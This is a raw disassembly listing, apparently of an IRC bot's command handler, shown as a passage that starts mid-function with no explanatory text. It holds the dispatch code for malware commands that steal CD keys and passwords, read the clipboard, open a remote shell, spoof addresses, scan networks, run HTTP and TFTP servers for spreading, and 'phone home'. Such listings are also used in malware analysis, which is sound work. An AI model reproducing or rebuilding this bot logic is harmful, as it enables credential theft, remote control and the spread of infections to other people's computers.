pop ecx
jz loc_404444
push edi ; Str2
push offset aNi ; "ni"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404444
push edi ; Str2
push offset aSysinfo ; "sysinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404419
push edi ; Str2
push offset aSi ; "si"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404419
push edi ; Str2
push offset aRemove ; "remove"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4043DF
push edi ; Str2
push offset aRm ; "rm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4043DF
push edi ; Str2
push offset aProcs ; "procs"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4042BF
push edi ; Str2
push offset aPs ; "ps"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4042BF
push edi ; Str2
push offset aGetcdkeys ; "getcdkeys"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4042A1
push edi ; Str2
push offset aKey ; "key"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4042A1
push edi ; Str2
push offset aUptime ; "uptime"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404219
push edi ; Str2
push offset aUp ; "up"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404219
push edi ; Str2
push offset aDriveinfo ; "driveinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041FC
push edi ; Str2
push offset aDrv ; "drv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041FC
push edi ; Str2
push offset aTestdlls ; "testdlls"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041E3
push edi ; Str2
push offset aDll ; "dll"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4041E3
push edi ; Str2
push offset aOpencmd ; "opencmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40416F
push edi ; Str2
push offset aOcmd ; "ocmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40416F
push edi ; Str2
push offset aCmdstop ; "cmdstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4035C5
push dword ptr [ebp+esi+Args]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_441D20
jmp loc_4047E3
; ---------------------------------------------------------------------------
loc_4035C5: ; CODE XREF: sub_401CC7+18E4�j
push edi ; Str2
push offset aWho ; "who"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4036DB
cmp [ebp+var_8], ebx
jnz short loc_4035F9
push ebx ; int
push [ebp+var_4] ; int
push offset dword_441D30 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_4035F9: ; CODE XREF: sub_401CC7+1916�j
mov eax, [ebp+arg_18]
xor edi, edi
mov [ebp+arg_18], eax
jmp short loc_403606
; ---------------------------------------------------------------------------
loc_403603: ; CODE XREF: sub_401CC7+1986�j
mov eax, [ebp+arg_18]
loc_403606: ; CODE XREF: sub_401CC7+193A�j
cmp [eax], bl
jz short loc_40360D
inc eax
jmp short loc_403612
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_401CC7+1941�j
mov eax, offset aEmpty ; "<Empty>"
loc_403612: ; CODE XREF: sub_401CC7+1944�j
push eax
push edi
lea eax, [ebp+Dst]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add [ebp+arg_18], 80h
add esp, 24h
inc edi
cmp edi, 3
jl short loc_403603
push offset unk_441D54
call sub_415C77
pop ecx
loc_40365A: ; CODE XREF: sub_401CC7+1C17�j
; sub_401CC7+2F4C�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
mov [ebp+arg_20], edi
jz loc_402166
push [ebp+arg_8] ; Str2
push offset aSpoof ; "spoof"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404D00
push offset Str2 ; "off"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404C25
lea eax, [ebp+Dst]
push offset asc_44229C ; "-"
push eax ; Dest
mov dword_4E7A18, ebx
call _sprintf
pop ecx
pop ecx
loc_4036B1: ; CODE XREF: sub_401CC7+3034�j
cmp [ebp+var_8], ebx
jnz loc_409B47
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
loc_4036D3: ; CODE XREF: sub_401CC7+7288�j
add esp, 14h
jmp loc_409B47
; ---------------------------------------------------------------------------
loc_4036DB: ; CODE XREF: sub_401CC7+190D�j
push edi ; Str2
push offset aGetclip ; "getclip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40412E
push edi ; Str2
push offset aGc ; "gc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40412E
push edi ; Str2
push offset aFlusharp ; "flusharp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404117
push edi ; Str2
push offset aFarp ; "farp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_404117
push edi ; Str2
push offset aFlushdns ; "flushdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4040DF
push edi ; Str2
push offset aFdns ; "fdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4040DF
push edi ; Str2
push offset aCurrentip ; "currentip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4040A5
push edi ; Str2
push offset aCip ; "cip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4040A5
push edi ; Str2
push offset aRloginserver ; "rloginserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F6A
push edi ; Str2
push offset aRlogin ; "rlogin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F6A
push edi ; Str2
push offset aHttpserver ; "httpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403DDE
push edi ; Str2
push offset aHttp ; "http"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403DDE
push edi ; Str2
push offset aTftpserver ; "tftpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403CA4
push edi ; Str2
push offset aTftp ; "tftp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403CA4
push edi ; Str2
push offset aCrash ; "crash"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403867
lea eax, [ebp+Dst]
push offset asc_442084 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_403846
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_403846: ; CODE XREF: sub_401CC7+1B61�j
lea eax, [ebp+Dst]
push eax ; Str2
call sub_415C77
mov [esp+5D98h+var_5D98], offset aCrash_0 ; "crash"
push [ebp+esi+var_7C] ; Str1
call _strcmp
jmp loc_409CD3
; ---------------------------------------------------------------------------
loc_403867: ; CODE XREF: sub_401CC7+1B49�j
push edi ; Str2
push offset aScan_0 ; "scan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40399D
push edi ; Str2
push offset aScan_1 ; "scan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40399D
push edi ; Str2
push offset aPhonehome ; "phonehome"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4038BE
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n"
push [ebp+arg_4] ; int
call sub_409D26
loc_4038B6: ; CODE XREF: sub_401CC7+472�j
add esp, 0Ch
jmp loc_402166
; ---------------------------------------------------------------------------
loc_4038BE: ; CODE XREF: sub_401CC7+1BD9�j
push edi ; Str2
push offset aFindpass ; "findpass"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4038E4
push edi ; Str2
push offset aFp ; "fp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40365A
loc_4038E4: ; CODE XREF: sub_401CC7+1C06�j
push [ebp+Format] ; Format
lea eax, [ebp+var_F54]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_F58], eax
mov eax, [ebp+var_4]
mov [ebp+var_ED0], eax
mov eax, [ebp+var_8]
mov [ebp+var_ECC], eax
push offset asc_44222C ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 26h ; int
push eax ; Source
call sub_40B78E
add esp, 18h
mov [ebp+var_ED4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_F58]
push ebx
push eax
push offset sub_417AC3
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_ED4]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40398C
loc_403976: ; CODE XREF: sub_401CC7+1CC3�j
cmp [ebp+var_EC8], ebx
jnz loc_408708
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_403976
; ---------------------------------------------------------------------------
loc_40398C: ; CODE XREF: sub_401CC7+1CAD�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_442254
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_40399D: ; CODE XREF: sub_401CC7+1BAF�j
; sub_401CC7+1BC4�j
mov al, byte_44942A
mov [ebp+Src], ebx
cmp al, bl
mov edx, offset byte_44942A
jz loc_402166
mov ecx, edx
loc_4039B4: ; CODE XREF: sub_401CC7+1CF5�j
inc [ebp+Src]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4039B4
cmp al, bl
jz loc_402166
mov [ebp+arg_18], edx
loc_4039C9: ; CODE XREF: sub_401CC7+1FC8�j
push 0Bh
call sub_40B9D6
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+Src]
add eax, ecx
cmp eax, 1F4h
jle short loc_403A18
push ecx
lea eax, [ebp+Dst]
push offset asc_4420B8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 20h
jmp loc_403C86
; ---------------------------------------------------------------------------
loc_403A18: ; CODE XREF: sub_401CC7+1D1C�j
or [ebp+var_730], 0FFFFFFFFh
cmp dword_449248, ebx
mov [ebp+var_734], 64h
mov [ebp+var_748], 5
mov [ebp+var_744], 320h
mov [ebp+Src], ebx
jz short loc_403A89
mov eax, [ebp+arg_18]
mov esi, offset dword_449248
lea edi, [eax-0Ah]
loc_403A53: ; CODE XREF: sub_401CC7+1DA4�j
lea eax, [esi-28h]
push edi ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_403A6F
inc [ebp+Src]
add esi, 40h
cmp [esi], ebx
jnz short loc_403A53
jmp short loc_403A89
; ---------------------------------------------------------------------------
loc_403A6F: ; CODE XREF: sub_401CC7+1D9A�j
mov eax, [ebp+Src]
mov ecx, eax
mov [ebp+var_730], eax
shl ecx, 6
mov ecx, dword_449248[ecx]
mov [ebp+var_74C], ecx
loc_403A89: ; CODE XREF: sub_401CC7+1D7F�j
; sub_401CC7+1DA6�j
cmp [ebp+var_74C], ebx
jz loc_403C9A
push 10h
lea eax, [ebp+var_2CC]
pop esi
push eax
lea eax, [ebp+var_30C]
push eax
mov [ebp+var_2CC], esi
push [ebp+arg_4]
call dword_4E41C4 ; getsockname
mov al, [ebp+var_8FF]
push esi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+Count], eax
push [ebp+Count] ; Count
call dword_4E42AC ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_860]
push eax ; Dest
call _strncpy
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_860]
push eax ; Str
call _strrchr
add esp, 14h
cmp esi, ebx
mov byte ptr [ebp+File+3], bl
jle short loc_403B31
loc_403B0F: ; CODE XREF: sub_401CC7+1E68�j
cmp eax, ebx
jz short loc_403B31
mov byte ptr [eax], 78h
lea eax, [ebp+var_860]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, esi
jl short loc_403B0F
loc_403B31: ; CODE XREF: sub_401CC7+1E46�j
; sub_401CC7+1E4A�j
mov eax, [ebp+arg_4]
push [ebp+Format] ; Format
mov esi, [ebp+var_4]
mov edi, [ebp+var_8]
mov [ebp+var_750], eax
lea eax, [ebp+var_850]
push 80h ; Count
push eax ; Dest
mov [ebp+var_720], 1
mov [ebp+var_728], esi
mov [ebp+var_724], edi
call __snprintf
push offset byte_4E40C8 ; Str2
push offset aHelp ; "##help"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_403B9E
push offset aHelp ; "##help"
lea eax, [ebp+var_7D0]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_403BA4
; ---------------------------------------------------------------------------
loc_403B9E: ; CODE XREF: sub_401CC7+1EBA�j
mov [ebp+var_7D0], bl
loc_403BA4: ; CODE XREF: sub_401CC7+1ED5�j
cmp [ebp+var_720], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_403BB6
mov eax, offset aSequential ; "Sequential"
loc_403BB6: ; CODE XREF: sub_401CC7+1EE8�j
push [ebp+var_734]
lea ecx, [ebp+var_860]
push [ebp+var_744]
push [ebp+var_748]
push [ebp+var_74C]
push ecx
push eax
lea eax, [ebp+Dst]
push offset asc_442144 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B78E
add esp, 2Ch
mov [ebp+var_740], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40CBA1
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_740]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_403C40
loc_403C2E: ; CODE XREF: sub_401CC7+1F77�j
cmp [ebp+var_71C], ebx
jnz short loc_403C5B
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_403C2E
; ---------------------------------------------------------------------------
loc_403C40: ; CODE XREF: sub_401CC7+1F65�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset asc_4421B0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_403C5B: ; CODE XREF: sub_401CC7+1F6D�j
cmp edi, ebx
jnz short loc_403C79
push ebx ; int
lea eax, [ebp+Dst]
push esi ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_403C79: ; CODE XREF: sub_401CC7+1F96�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
pop ecx
loc_403C86: ; CODE XREF: sub_401CC7+1D4C�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_4039C9
jmp loc_402166
; ---------------------------------------------------------------------------
loc_403C9A: ; CODE XREF: sub_401CC7+1DC8�j
push offset unk_4420F8
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_403CA4: ; CODE XREF: sub_401CC7+1B1F�j
; sub_401CC7+1B34�j
push 5
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_403CBA
push offset unk_441FEC
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_403CBA: ; CODE XREF: sub_401CC7+1FE7�j
mov eax, dword ptr [ebp+esi+Args]
cmp eax, ebx
jz short loc_403CDD
push eax ; Format
mov edi, 104h
lea eax, [ebp+var_2D50]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_403CF1
; ---------------------------------------------------------------------------
loc_403CDD: ; CODE XREF: sub_401CC7+1FFC�j
mov edi, 104h
lea eax, [ebp+var_2D50]
push edi
push eax
push ebx
call ds:dword_4F6378 ; GetModuleFileNameA
loc_403CF1: ; CODE XREF: sub_401CC7+2014�j
mov esi, [ebp+esi+Format]
cmp esi, ebx
jnz short loc_403D01
mov esi, offset Str ; "wgl23.exe"
loc_403D01: ; CODE XREF: sub_401CC7+2033�j
push esi ; Format
lea eax, [ebp+var_2C4C]
push edi ; Count
push eax ; Dest
call __snprintf
mov eax, dword_440078
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_2B40], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2B44], ebx
mov [ebp+var_2D54], eax
lea eax, [ebp+var_2B3C]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_2ABC], eax
mov eax, [ebp+var_8]
mov [ebp+var_2AB8], eax
lea eax, [ebp+var_2D50]
push eax
lea eax, [ebp+Dst]
push [ebp+var_2B40]
push offset asc_44200C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 5 ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_2B48], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2D54]
push ebx
push eax
push offset sub_41224F
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_2B48]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_403DCD
loc_403DB7: ; CODE XREF: sub_401CC7+2104�j
cmp [ebp+var_2AB4], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_403DB7
; ---------------------------------------------------------------------------
loc_403DCD: ; CODE XREF: sub_401CC7+20EE�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_442040
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_403DDE: ; CODE XREF: sub_401CC7+1AF5�j
; sub_401CC7+1B0A�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_403DFD
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_403DFD
push edi ; Str
call _atoi
pop ecx
jmp short loc_403E02
; ---------------------------------------------------------------------------
loc_403DFD: ; CODE XREF: sub_401CC7+2120�j
; sub_401CC7+212B�j
mov eax, dword_44007C
loc_403E02: ; CODE XREF: sub_401CC7+2134�j
mov esi, [ebp+esi+Format]
mov [ebp+var_36C8], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_36B4], eax
jz short loc_403E35
lea eax, [ebp+var_37CC]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_403E60
; ---------------------------------------------------------------------------
loc_403E35: ; CODE XREF: sub_401CC7+215B�j
lea eax, [ebp+FullPath]
push 104h
push eax
call ds:dword_4F637C ; GetSystemDirectoryA
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
add esp, 14h
loc_403E60: ; CODE XREF: sub_401CC7+216C�j
lea eax, [ebp+var_37CC]
push eax ; Str
call _strlen
cmp [ebp+eax+var_37CD], 5Ch
pop ecx
jnz short loc_403E8B
lea eax, [ebp+var_37CC]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_37CD], bl
loc_403E8B: ; CODE XREF: sub_401CC7+21AE�j
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
lea eax, [ebp+var_3A54]
mov [ebp+var_3A58], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_36B8], eax
lea eax, [ebp+var_37CC]
mov [ebp+var_36BC], edi
push eax
push [ebp+var_36C8]
push esi
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_441F60 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 3 ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_36C0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3A58]
push ebx
push eax
push offset sub_40FB88
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_36C0]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_403F3F
loc_403F2D: ; CODE XREF: sub_401CC7+2276�j
cmp [ebp+var_36AC], ebx
jnz short loc_403F5A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_403F2D
; ---------------------------------------------------------------------------
loc_403F3F: ; CODE XREF: sub_401CC7+2264�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset asc_441F9C ; "-"
loc_403F4B: ; CODE XREF: sub_401CC7+23D9�j
; sub_401CC7+4E0C�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_403F5A: ; CODE XREF: sub_401CC7+226C�j
; sub_401CC7+23BD�j ...
cmp [ebp+var_8], ebx
jnz loc_408708
push ebx
push edi
jmp loc_4075CD
; ---------------------------------------------------------------------------
loc_403F6A: ; CODE XREF: sub_401CC7+1ACB�j
; sub_401CC7+1AE0�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_403F89
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_403F89
push edi ; Str
call _atoi
pop ecx
jmp short loc_403F8E
; ---------------------------------------------------------------------------
loc_403F89: ; CODE XREF: sub_401CC7+22AC�j
; sub_401CC7+22B7�j
mov eax, dword_440080
loc_403F8E: ; CODE XREF: sub_401CC7+22C0�j
mov [ebp+var_1824], eax
mov eax, [ebp+esi+Format]
cmp eax, ebx
jnz short loc_403FA5
lea eax, [ebp+var_C0]
loc_403FA5: ; CODE XREF: sub_401CC7+22D6�j
push eax ; Format
lea eax, [ebp+var_1964]
push 40h ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+Str2]
add esp, 0Ch
cmp esi, ebx
jnz short loc_403FC7
mov esi, offset dword_4E40C4
loc_403FC7: ; CODE XREF: sub_401CC7+22F9�j
push esi ; Format
lea eax, [ebp+var_1924]
push 100h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_19E4]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1810], eax
lea eax, [ebp+var_1964]
push eax
mov [ebp+var_19E8], esi
push [ebp+var_1824]
mov [ebp+var_1814], edi
push esi
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_441ED4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 9 ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_1820], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_19E8]
push ebx
push eax
push offset sub_411506
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1820]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_404094
loc_40407E: ; CODE XREF: sub_401CC7+23CB�j
cmp [ebp+var_180C], ebx
jnz loc_403F5A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40407E
; ---------------------------------------------------------------------------
loc_404094: ; CODE XREF: sub_401CC7+23B5�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_441F10
jmp loc_403F4B
; ---------------------------------------------------------------------------
loc_4040A5: ; CODE XREF: sub_401CC7+1AA1�j
; sub_401CC7+1AB6�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4040B8
push esi ; Str
call _atoi
jmp short loc_4040BF
; ---------------------------------------------------------------------------
loc_4040B8: ; CODE XREF: sub_401CC7+23E7�j
push 0Bh
call sub_40B9F5
loc_4040BF: ; CODE XREF: sub_401CC7+23EF�j
cmp eax, ebx
pop ecx
jz loc_409B47
push eax ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40C0EE
jmp loc_4045A8
; ---------------------------------------------------------------------------
loc_4040DF: ; CODE XREF: sub_401CC7+1A77�j
; sub_401CC7+1A8C�j
mov eax, dword_4E413C
cmp eax, ebx
jz short loc_4040FC
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_4040F5
push offset unk_441E30
jmp short loc_404101
; ---------------------------------------------------------------------------
loc_4040F5: ; CODE XREF: sub_401CC7+2425�j
push offset unk_441E54
jmp short loc_404101
; ---------------------------------------------------------------------------
loc_4040FC: ; CODE XREF: sub_401CC7+241F�j
push offset asc_441E80 ; "-"
loc_404101: ; CODE XREF: sub_401CC7+242C�j
; sub_401CC7+2433�j ...
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_407025
; ---------------------------------------------------------------------------
loc_404117: ; CODE XREF: sub_401CC7+1A4D�j
; sub_401CC7+1A62�j
call sub_40AEC5
test eax, eax
jz short loc_404127
push offset unk_441DCC
jmp short loc_404101
; ---------------------------------------------------------------------------
loc_404127: ; CODE XREF: sub_401CC7+2457�j
push offset unk_441DF0
jmp short loc_404101
; ---------------------------------------------------------------------------
loc_40412E: ; CODE XREF: sub_401CC7+1A23�j
; sub_401CC7+1A38�j
cmp [ebp+var_8], ebx
jnz short loc_40414D
push ebx ; int
push [ebp+var_4] ; int
push offset dword_441D84 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_40414D: ; CODE XREF: sub_401CC7+246A�j
push ebx ; int
push [ebp+var_4] ; int
call sub_418F27
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
push offset dword_441D9C
jmp loc_404471
; ---------------------------------------------------------------------------
loc_40416F: ; CODE XREF: sub_401CC7+18BA�j
; sub_401CC7+18CF�j
push 0Ah
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_404182
push offset unk_441C94
jmp short loc_4041A3
; ---------------------------------------------------------------------------
loc_404182: ; CODE XREF: sub_401CC7+24B2�j
push [ebp+Format]
push [ebp+arg_4]
call sub_41AB7D
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40419E
push offset unk_441CC0
jmp short loc_4041A3
; ---------------------------------------------------------------------------
loc_40419E: ; CODE XREF: sub_401CC7+24CE�j
push offset asc_441CE8 ; "-"
loc_4041A3: ; CODE XREF: sub_401CC7+24B9�j
; sub_401CC7+24D5�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4041B1: ; CODE XREF: sub_401CC7+59B1�j
cmp [ebp+var_8], ebx
jnz short loc_4041D2
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
loc_4041CA: ; CODE XREF: sub_401CC7+6FD8�j
call sub_409D6C
add esp, 14h
loc_4041D2: ; CODE XREF: sub_401CC7+24ED�j
; sub_401CC7+26E8�j ...
lea eax, [ebp+Dst]
push eax
call sub_415C77
jmp loc_409CD4
; ---------------------------------------------------------------------------
loc_4041E3: ; CODE XREF: sub_401CC7+1890�j
; sub_401CC7+18A5�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40AAC8
jmp loc_404492
; ---------------------------------------------------------------------------
loc_4041FC: ; CODE XREF: sub_401CC7+1866�j
; sub_401CC7+187B�j
push dword ptr [ebp+esi+Args] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_4177D5
jmp loc_404492
; ---------------------------------------------------------------------------
loc_404219: ; CODE XREF: sub_401CC7+183C�j
; sub_401CC7+1851�j
or edi, 0FFFFFFFFh
call ds:dword_4F63B0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+Src], eax
jz short loc_404242
push esi ; Str
call _atoi
pop ecx
mov edi, eax
loc_404242: ; CODE XREF: sub_401CC7+2570�j
mov eax, [ebp+Src]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_40425B
cmp edi, 0FFFFFFFFh
jnz loc_409B47
loc_40425B: ; CODE XREF: sub_401CC7+2589�j
push ebx
call sub_41B7A7
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_441C4C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
lea eax, [ebp+Dst]
push eax
call sub_415C77
loc_404299: ; CODE XREF: sub_401CC7+53EC�j
add esp, 24h
jmp loc_409B47
; ---------------------------------------------------------------------------
loc_4042A1: ; CODE XREF: sub_401CC7+1812�j
; sub_401CC7+1827�j
push [ebp+var_4]
push [ebp+Format]
push [ebp+arg_4]
call sub_4165C9
add esp, 0Ch
push offset dword_441C20
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_4042BF: ; CODE XREF: sub_401CC7+17E8�j
; sub_401CC7+17FD�j
push 27h
